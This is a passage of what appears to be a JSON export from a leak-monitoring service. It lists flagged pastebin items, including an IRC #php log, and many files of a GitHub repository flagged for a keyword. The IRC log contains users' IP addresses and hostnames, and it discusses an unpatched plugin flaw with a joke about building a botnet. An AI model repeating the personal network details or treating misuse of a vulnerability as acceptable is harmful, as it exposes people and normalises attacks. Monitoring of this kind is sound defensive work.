"0083e0516cac929a5f5267f8f5ebebb77063f235", + "language": "xml", + "linkList": [ + { + "author": "", + "hash": "024c788fdacdd8b8827de9e50c13ea0e6dde1988", + "link": "https://pastebin.com/HPjD9kmj", + "title": "", + "source": "pastebin.com", + "dateDetected": "2022-05-05T20:26:25+03:00", + "datePublished": "2022-05-05T17:16:43+00:00", + "itemSource": "api", + "size": 6625, + "status": 1, + "sequenceUpdate": 1651771585142655 + } + ], + "matches": { + "commonKeywords": { + "password": [ + "PASSWORD" + ] + } + }, + "seqUpdate": -1651773180003874, + "updated": "2022-05-05T20:26:25+03:00" + }, + { + "bind": [], + "created": "2017-09-17T17:06:08+03:00", + "data": "* kicken (~Keith@c-98-238-66-220.hsd1.fl.comcast.net) has joined #php\r\n oh? which one?\r\n hmm\r\n let me finish up the write-up\r\n then I'll let you know\r\n but google shows me ~50k people who are vulnerable, and it's full db disclosure\r\n well, enough db disclosure :)\r\n fun fun\r\n gimme the url to your write-up when you get it finished\r\n im not the publisher, am i?\r\n lol\r\n s/publisher/plugin author/\r\n no ansi\r\n* OscarWeb (~hola@186.59.129.134) has joined #php\r\n* OscarWeb has quit (Quit: zzzzZZzzzzZzzZzZz)\r\n ansi, I think I'm going to do the right thing and notify the vendor\r\n where's the fun in that\r\n build a botnet\r\n does wordpress use bcrypt or something now?\r\n responsible poutine is boring", + "displayOptions": { + "isFavourite": false, + "isHidden": false + }, + "evaluation": { + "admiralty_code": "C3", + "credibility": 50, + "reliability": 50, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "hash": "c2224f5f81bb375ba7c2871f605b1c6825ef1092", + "id": "c2224f5f81bb375ba7c2871f605b1c6825ef1092", + "language": "text", + "linkList": [ + { + "author": "guest", + "hash": "f2a78d1716758091c7df9629d6a5ac81cfa4ee0e", + "link": "https://pastebin.com/7MK8SZww", + "title": "Untitled", + "source": "pastebin.com", + "dateDetected": "2017-09-17T17:06:08+03:00", + "datePublished": "2017-09-17T09:06:06+03:00", + "itemSource": "", + "size": 821, + "status": 1, + "sequenceUpdate": 1505657168596901 + } + ], + "matches": { + "email": { + "email": [ + "Keith@c-98-238-66-220.hsd1.fl.comcast.net", + "hola@186.59.129.134" + ] + } + }, + "seqUpdate": 16202106434186, + "updated": "2017-09-17T17:06:08+03:00" + } + ], + "seqUpdate": 16202106434186 + }, + "osi/git_repository":{ + "count": 4, + "items": [ + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "password": 1 + }, + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T22:34:14+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-07-29T19:15:41+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "53e081b81ede4de32383bfc7a274877cad14cca0", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "8b6cd23d023fbc3f2117b5cb9cb1de5ee936e639", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647341 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff4809c63e236267da1987e2f85b6e3b67492cbf", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1107c7dc3a868e7d2e28c3d45aedcee685991b8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/AscCommonCommands/AscCommonCommands.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/AscCommonCommands/AscCommonCommands.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f840db446914b74742a2edc06997a14754b6701b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "d8aa39502e78cf1b7fc693ddc2a8d87584de591d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/DbgAscCommandHandler/DbgAscCommandHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "5ff597aa0bcf83af6a0065a87369db0d35a0aa9c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "0ae60813662b989e7be38ed11ad3b678d849a4f2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Application/StatusManager/StatusManager.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Application/StatusManager/StatusManager.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4a88bc25d04b611667615d9585c83f352c11a08b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "46263a0e8543c3175e88cfb952feef77958e53dc", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/EepromHandler/EepromHandler.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/EepromHandler/EepromHandler.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "bfb9458a904b3ea4678e5b4bab830cf7465b268f", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f28470e0347408c6d0685216469977d28e53424c", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c5135779e4588be9194eb3071df4995dbedf33c1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/Drivers/ManchesterCodec/ManchesterCodec_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Drivers/ManchesterCodec/ManchesterCodec_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "c44d8ea280f030c7362c70017508cb85ccc06493", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/EepromHandler/EepromHandler_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/EepromHandler/EepromHandler_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "975e59dd47c018657eb4485ab657ead8b26aa7ca", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "3e94a9678391f553e474fa9b0eccb23cb90e8119", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_cfg.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e6bf52a33c7a082acf383899af13d8f5ccef8ff", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/DriversConfig/ManchesterCodec/ManchesterCodec_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "4c17b93006a28fbdd11c08f6414917f3ba6cd239", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03201ac767aec006a655436c3eafb23851ffd278", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "87be0468bcd0e9cd0d64fa437d9c81568d12e1f8", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Clock/Clock_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Clock/Clock_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "9b85a966fad22a4381a23c5969a32f7bee3b3d87", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1e32591e9ce43d29533952ee0ed4e6d86e7229cd", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "f2ed48312c0ac906ef9bb88b709ba744a15dd534", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/DAC/Dac_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/DAC/Dac_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2594cfc267fb69cba8616f8495ed5cb9fca33a8b", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "2ec1a197969971fc073fe834a03844dac415ff60", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "1a20c1e212e4e2020e86bc2979ead2969b57be26", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/Event/Event_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/Event/Event_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "89b65948485f8d1f576bef18f5a158eee70d45f1", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.c", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.c" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "03563a4a63afa79c73f4d3c0eb90410b7135a5cb", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "b942402e4a72a5ed96bc1c247886bf3431142f88", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/HAL/GPIO/Gpio_def.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/HAL/GPIO/Gpio_def.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:38+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "ff1a9f0c737f8350268dd076797c54ab767f4f94", + "matchesType": [ + "keyword" 